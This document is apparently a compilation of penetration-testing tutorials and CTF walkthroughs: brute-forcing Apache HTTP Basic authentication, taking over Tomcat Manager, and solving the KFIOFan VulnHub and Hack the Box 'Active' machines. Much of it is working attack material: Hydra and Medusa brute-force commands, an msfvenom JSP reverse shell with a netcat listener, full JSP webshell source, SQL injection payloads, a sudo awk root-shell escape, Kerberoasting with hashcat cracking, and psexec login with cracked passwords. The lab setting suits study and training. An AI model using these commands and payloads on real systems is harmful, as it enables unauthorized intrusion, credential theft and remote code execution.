Multiple Ways To Exploit HTTP Authentication

In this article, we will learn about how to configure the password protected Apache Web Server to restrict from online visitors without validation so that we can hide some essential and critical information to the un-authenticated users and how to penetrate it’s the weak configuration to breach its security and exploit it.

Table of Content

Introduction to HTTP Basic Authentication

§  Lab Set_up Requirement

Set Up Password Authentication

§  Installing the Apache Utilities Package

§  Creating the Password File

§  Configuring Access Control inside the Virtual Host Definition

§  Configuring Access Control with .htaccess Files

§  Confirm the Password Authentication

Exploiting HTTP Authentication

§  xHydra

§  Hydra

§  Ncrack

§  Mdeusa

§  Metasploit

§  Burpsuite

Introduction to HTTP Basic Authentication

In the context of a HTTP transaction, basic access authentication is a method for a HTTP user agent to provide a user name and password when making a request.

HTTP Basic authentication (BA) implementation is the simplest technique for enforcing access controls to web resources because it doesn’t require cookies, session identifiers, or login pages; rather, HTTP Basic authentication uses standard fields in the HTTP header, obviating the need for handshakes.

The BA mechanism provides no confidentiality protection for the transmitted credentials. They are merely encoded with Base64 in transit, but not encrypted or hashed in any way. HTTPS is, therefore, typically preferred used in conjunction with Basic Authentication.

For more details read from wikipedia.org

Lab Set_up Requirement

Apache Server (Ubuntu 14.04)

Penetration Testing Machine (Kali Linux)

Set Up Password Authentication

Installing the Apache Utilities Package

Let’s start with following command to install an Apache2 utility package called ‘htpasswd’. The htpasswd is used to create and update the flat-files used to store usernames and password for basic authentication of HTTP users.

sudo apt-get install apache2 apache2-utils

Creating the Password File

Now use htpasswd command to create a password file that Apache will use to authenticate users and use a hidden file “.htpasswd” in our /etc/apache2 configuration directory to store password.

sudo htpasswd -c /etc/apache2/.htpasswd raj

cat /etc/apache2/.htpasswd

gedit etc/apache2/sites-enabled/000-default.conf

Configuring Access Control inside the Virtual Host Definition

Now saved the following configuration in 000-default.conf file.

        AuthType Basic

        AuthName "Restricted Content"

        AuthUserFile /etc/apache2/.htpasswd

        Require valid-user

   

Configuring Access Control with .htaccess Files

Open the main Apache configuration file to enable password protection using .htaccess files and add following line as highlighted.

sudo gedit /etc/apache2/apache2.conf

ServerName localhost

Enable .htaccess processing by changing the AllowOverride directive "None" to "All" in the block for the /var/www directory and then save the file and restart the apache service.

    Options Indexes FollowSymLinks

    AllowOverride All

    Require all granted

Next, you need to add an .htaccess file to the directory you wish to restrict. Here, I want restrict the entire website which is could be through /var/www/html, but you can place this file in any directory where you wish to restrict access:

sudo nano /var/www/html/.htaccess

AuthType Basic

AuthName "Restricted Content"

AuthUserFile /etc/apache2/.htpasswd

Require valid-user

sudo service apache2 restart

While configuring .htaccess file we had added few options for the block directory. Let’s see what these configuration denotes.

AuthType Basic: This will set up a basic authentication for our site.

AuthName “Restricted Contents”: This will show the name of the authentication at the prompt.

AuthUserFile /etc/apache2/.htpasswd : This will show the location of the authentication file.

Require Valid-user: This will be used by one user who has confirmed their authentication who are permitted to access the website.

Confirm the Password Authentication

Try to access your restricted content in a web browser to confirm that your content is protected. I will be accessible with a username and password prompt that looks like this:

If you will try to access the website without authentication or canceled the Required Authentication page then it will displace 401 error Unauthorized Access.

If you are valid users and try to access password protected website by using valid credential, for example we had create an account with raj: 123 to access apache http service.

As you can observe that, now we are able to access the content of website.

Exploiting HTTP Authentication

xHydra

This is the graphical version to apply dictionary attack via FTP port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select HTTP in box against Protocol option and give the port number 80 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -L user.txt -P pass.txt 192.168.0.105 http-get

-L: denotes path for username list

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the HTTP username as raj and password as 123.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.

Run the following command

ncrack -U user.txt -P pass.txt http://192.168.0.105

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the HTTP username as raj and password as 123.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

medusa  -h 192.168.0.105 -U user.txt -P pass.txt -M http -f

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the HTTP username as raj and password as 123.

Metasploit

This module attempts to authenticate to an HTTP service. Open Kali terminal type msfconsole and then type: 

use auxiliary/scanner/http/http_login

msf auxiliary(scanner/http/http_login) > set user_file  user.txt

msf auxiliary(scanner/http/http_login) > set pass_file  pass.txt

msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105

msf auxiliary(scanner/http/http_login) >  set stop_on_success

msf auxiliary(scanner/http/http_login) > exploit

Burp Suite

Now here I had just typed the random value for authentication in order to fetch the request through burp suite. So before you sent the request to server turn on the burp suite and select proxy tab then, click on the intercept is on after then send the user authentication by clicking ok

Thus the sent request will be captured by burp suite which you can see in the given below image. In the screenshot I had highlighted some value in the last line. Here it tells the type of authentication provided is basic and if you have read above theory of basic authentication I had described that it is encoded in base 64.

Now time to generate the encoded value for authentication inside the burp suite. Click on action tab select send to intruder for HTTP Fuzzing attack.

Now open intruder frame and click on the position. Configure the position where payload will be inserted into the request. The attack type determines the way in which the payload assigned to payload position. Now select “the encoded value of authentication” for payload position and click to ADD button on the left side of the frame.

The base64 encoded value of Authentication is a combination of username and password now the scenario is to generate the same encoded value of authentication with the help of user password dictionary Therefore, I have made a dictionary which contains both user password names in a text file.

In order to use dictionary as payload click on payload tab under intruder; now load your dictionary which contains user password names from payload options.

But we want to send a request in the encoded value of our payload. To encode your payload click on ADD button available under payload processing.

 A new dialog box will generate to select the rule choose an encode option from the list; now select base 64 from drag down list of URL encode key character for payload processing.

This will start a brute force attack and try to match string for user authentication. In the screenshot you can observe the status “200 OK” and length “11788”of the highlighted value is different from rest of the values. This means we can use this encoded value to bypass the user authentication, which occur from request number 5. Now check the username and password on 5th line in the dictionary. In the dictionary I found raj: 123 have matching authentication.

Or you can also use this encoded Auth value to bypass the apache http authentication page via burp suite intercepted data.

Copy the above auth value and paste replace it with intercepted authorization a shown in below and forward the request to access restricted content.

Booom!!! Here we have successfully access the content of website.

Hope you people have enjoy this article and learnt how weak configuration security can easily breach and unauthorized person can access the restrict content of your website.

Multiple Ways to Exploit Tomcat Manager

Hello Friends, today through this article I would like to share my experience “how to exploit Tomcat Manger Application” if you have default login credential (tomcat: tomcat).  While playing CTF, many times I found Apache Tomcat is running in target machine that have configured with default login and this can help us to get remote machine shell. Therefore I feel, I should write all possible ways to exploit tomcat manger application to gaining webshell of remote machine.

Table of Content

§  Tomcat Manager Authenticated Upload Code Execution

§  Generate .war Format Backdoor

§  Tomcat War Deployer Script

§  Generate a JSP Webshell

Let’s start with nmap scan and to tomcat service check port 8080 as tomcat.

nmap -sV -p8080 192.168.1.101

From nmap output result, we found port 8080 is open for Apache Tomcat. So we navigate to web browser and on exploring Target IP: port we saw HTTP authentication page to login in tomcat manger application.

Tomcat Manager Authenticated Upload Code Execution

This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat

msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat

msf exploit(multi/http/tomcat_mgr_upload) > exploit

As result you can observe that, we have meterpreter session of the target machine.

Generate .war Format Backdoor

We can use msfvenom for generating a .war format backdoor for java/jsp payload, all you need to do is just follow the given below syntax to create .war format file and then run netcat listener.

Syntax: msfvenom -p [payload] LHOST=[Kali Linux IP] LPORT=[1234] -f [file format] > [file name]

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=1234 -f war > shell.war

nc -lvp 1234

Now login to tomcat manager application using tomcat: tomcat as username: password. You will be welcomed by admin dashboard where you can upload a .war file. 

As you can observe I had browser the malicious shell.war file to be deploy as highlighted in the image. As soon as you will upload your file, you will saw the /path entry for your file in the table of Applications.

To execute your .war file, you have to click on the /.war file path mention in the Application table. Or you can directly explore http://target_IP:port/file_name.

As soon as you will execute your file you will get reverse connection through netcat.

Booom!!! One more time we have access remote webshell.

Tomcat War Deployer Script

This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary).

In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat:tomcat ).

You can download it from here: https://github.com/mgeeky/tomcatWarDeployer

git clone https://github.com/mgeeky/tomcatWarDeployer

 cd tomcatWarDeployer

ls

Now follow the syntax to exploit the target machine without uploading .war file manually.

Syntax : ./tomcatWarDeployer.py -U [usrename] -p [password]-H [Kali Linux IP]-p [Listening port] [target_IP]:[tomcat_port]

./tomcatWarDeployer.py -U tomcat -P tomcat -H 192.168.1.108 -p 4567 192.168.1.101:8080

On executing above command, I got webshell directly as you can observe it in the given below image.

Generate a JSP Webshell

In this part, we are going to see how we can generate and deploy a Webshell to gain command execution on the Tomcat manger application.

First, we will need to write the Webshell and package it as a .war file format. To write the jsp Webshell, we are using the following code which I found from from this Link: https://pentesterlab.com/exercises/cve-2007-1860/course

<%@ page import="java.io.*" %>

<%

   String cmd = request.getParameter("cmd");

   String output = "";

   if(cmd != null) {

      String s = null;

      try {

         Process p = Runtime.getRuntime().exec(cmd,null,null);

         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));

         while((s = sI.readLine()) != null) { output += s+""; }

      }  catch(IOException e) {   e.printStackTrace();   }

   }

%>

<%=output %>

Save the code as index.jsp and then execute following command to package it as .war file.

mkdir webshell

cp index.jsp webshell/

cd webshell

jar -cvf ../webshell.war *

With the help of above command you will get a war file, which you can deploy in tomcat manger application.

As you can observe from the given below image, I had deployed my webshell.war file which successfully uploaded, now let’s click on this file for its execution.

On executing /webshell you will get a HTTP 404 error, now execute index.jsp file in the as given below:

http://192.168.1.106:8080/webshell/index.jsp

On executing above URL you will get command execution form, now use it wisely to cmd commands.

Hopefully! You have enjoyed this article how to get access to the Tomcat manager using CVE-2007-1860

KFIOFan:1 Vulnhub Walkthrough

Hello friends!! Today we are going to take another boot2root challenge known as KFIOFan. This lab is design in French language and involve Geographical coordinates factor of France to Begin this CTF where you have to find 4 flags by using your web penetration testing skill because this machine is vulnerable to SQL.

Official Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware ! (IMPORTANT NOTE : The whole challenge is in french, including server conf. Which may add to the difficulty if you are non-native or using a non-azerty keyboard)

You can download this VM here.

Penetration Methodology

Network Scanning

§  Open port and Running Service (Nmap)

Enumeration

§  Abusing Http service for obtaining Credential

§  Use robot.txt for first flag

Exploit

§  Exploiting SQL vulnerability

§  Obtain SSH RSA_Key

§  SSH Login

§  Catch another flag

Privilege Escalation

§  Check Sudo rights

§  Spwan root access

§  Capture the last flag

Walkthrough

Network Scanning

Let’s start off with scanning the network to find our target.

nmap -A 192.168.1.105

So from nmap we found two ports (22, 80) are open in the target’s machine, therefore let’s navigate to port 80 in the browser.

Enumeration

On exploring port 80, we notice it required authentication but we don’t know that. Moreover there was a text message (This site says: “48.416667 -0.916667”) which was pointing towards some Geographical coordinates.

When we canceled the authentication page, we saw a message in French language which was saying “Let me guess Bob, did you lose your password again? LOL”. Here we considered Bob as authorized username.

On searching 48.416667 -0.916667 coordinates in Google map, we get the location “Levaré” which could be the possible password for user Bob.

Hmmmm!! So our prediction was true and we successfully bypass HTTP authentication using Bob: Levaré

Note: Well this was not that much easier because on reboot this machine the Geo coordinates gets changed and you will get the password accordingly.

Luckily, on exploring /robot.txt, I found our first flag randomly which was in French language and again I translate it here:

FLAG1: Congratulations you found the first flag! (Yes I know you're hoping for a clue but at least you have the right reflexes!)

As officially describe above “Two french people want to start the very first fanclub of the youtuber” and from the given web page we can easily read the name of that two people (Alice and Bob) are usernames.

Exploit

Again I translate the whole text of this web page and conclude user “Alice” holds some very crucial information or any important file such as SSH key.

A link on Khaosearch brings me on the search form for the CTF author's YouTube channel, without wasting time I check for sql injection by injecting following query:

raj" union select 1,2;#

Lol J ! It was vulnerable to SQL injections, let’s exploit quickly.

With the help of following query we try to all table and column names from inside the database.

raj" union select table_name, column_name from information_schema.columns;#

I stumped when I saw an entry for SSH_Key, then I decided to check it, as it seems the most exciting.

I found another link as Alice when inject following query to check ssh_key

raj" union select * from ssh_keys;

Alice was holding Private SSH_Key which should be open properly, therefore I visit source code of this page here.

Then copy the RSA Key from -----BEGIN RSA PRIVATE KEY----- to -----END RSA PRIVATE KEY----- and past in a text file as “id_rsa” then set permission 600 for proper authentication.

chmod 600 id_rsa

Privilege Escalation

Now then connect to ssh using above key and run following command:

ssh alice@192.168.1.105 -i id_rsa

ls

cat flag3.txt

So we have successfully connected to ssh and found 3^rd flag also.

FLAG 3: Congratulations for coming here. This shows that you master very well the essential concepts! One last little effort and the root is yours!

For finding 4^th flag we need to escalate root privilege, let’s identify sudo rights for alice with the help of following command.

sudo -l

Hmmm!! So here alice can run awk as root without using password and we can easily spawn root shell by exploit this permission

sudo awk 'BEGIN {system("/bin/bash")}'

ls

cat flag4.txt

FLAG 4: COMPLETE! Congratulations to you for coming here: the machine is yours, its survival or destruction is now entirely based on your ethics. Good luck Hacker!

Note: On rebooting this VM machine the Geo coordinates get changed each time which will also affect password and SSH key and you get new password and SSH_key each time.

Hack the Box: Active Walkthrough

Today we are going to solve another CTF challenge “Active”. Active is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Penetration Methodologies

Scanning Network

§  Open ports and Running services (Nmap)

Enumeration

§  Identify share files (Linux4enum)

§  Access share file via Anonymous login (smbclient)

§  Decrypting cpassword (Gpprefdecrypt.py)

Access Victim’s Shell via SMB connect

§  Access share file user login

§  Get User.txt

Privilege Escalation

§  Find Service Principal Names (GetUserSPNs.py)

§  Crack the hash (Hashcat)

§  Psexec Exploit (Metasploit)

§  Get root.txt

Walkthrough

Scanning Network

Note: Since these labs are online available therefore they have a static IP. The IP of Active is 10.10.10.100

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sV 10.10.10.100

As you can observe from Nmap scanning result, there are so many open ports along with their running services, the OS is Microsoft Windows server 2008:r2:sp1 and you can also read the domain name “active.htb”.

Enumeration

I try eternal blue attack when I saw port 445 was open but I guess this was Patched version of SMB, therefore I have to start with enum4linux script. As we all know it is the best script for SMB enumeration.

./enum4liux -S 10.10.10.100

It has shown anonymous login for /Replication share file.

Then I try to access /Replication with the help smbclient and run the following command to access this directory via anonymous account:

smbclient //10.10.10.100/Replication

Here I downloaded Groups.xml file which I found from inside the following path:

\active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\

So here I found cpassword attribute value embedded in the Groups.xml for user SVC_TGS.

Therefore I download a python script “Gpprefdecrypt” from GitHub to decrypt the password of local users added via Windows 2008 Group Policy Preferences (GPP) and obtain the password: GPPstillStandingStrong2k18.

python Gpprefdecrypt.py < cpassword attribute value >

Access Victim’s Shell via SMB connect

Using above credential we connect to SMB with the help of following command and successfully able to catch our 1^st flag “user.txt” file.

smbclient //10.10.10.100/Users -U SVC_TGS

Now, it’s time to hunt root.txt file and as always seen that for obtain root.txt file we need to escalated root privilege, therefore let’s add Host_IP and Host_name inside /etc/hosts file in our local machine.

Privilege Escalation

In nmap scanning result we saw port 88 was open for Kerberos, hence their much be some Service Principal Names (SPN) that are associated with normal user account. Therefore we downloaded and install impacket from Github for using its python class GetUserSPN.py

./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18

I copied the hash value into a text file “hash.txt” for its decryptions.

Then with the help of hashcat we find out the hash mode and as result it shown 13100 for Kerberos 5 TGS-REP etype 23

hashcat -h |grep -i tgs

Finally, it was time to crack the hashes and obtain the password by using rockyou.txt wordlist.

hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force ---show

Hurray!!! We got it, Ticketmaster1968 for administrator.

Without wasting time I load metaploit framework and run following module to spawn full privilege system shell.

msf > use exploit/windows/smb/psexec

msf exploit windows/smb/psexec) > set rhost 10.10.10.100

msf exploit(windows/smb/psexec) > set smbuser administrator

msf exploit(windows/smb/psexec) > set smbpass Ticketmaster1968

msf exploit(windows/smb/psexec) > exploit

BOOOMMM…………………

Now we are inside the root shell, let’s chase towards root.txt file and finish this challenge.

Yuppieee! We found our 2^nd flag the root.txt file form inside /Users/Administrator/Desktop.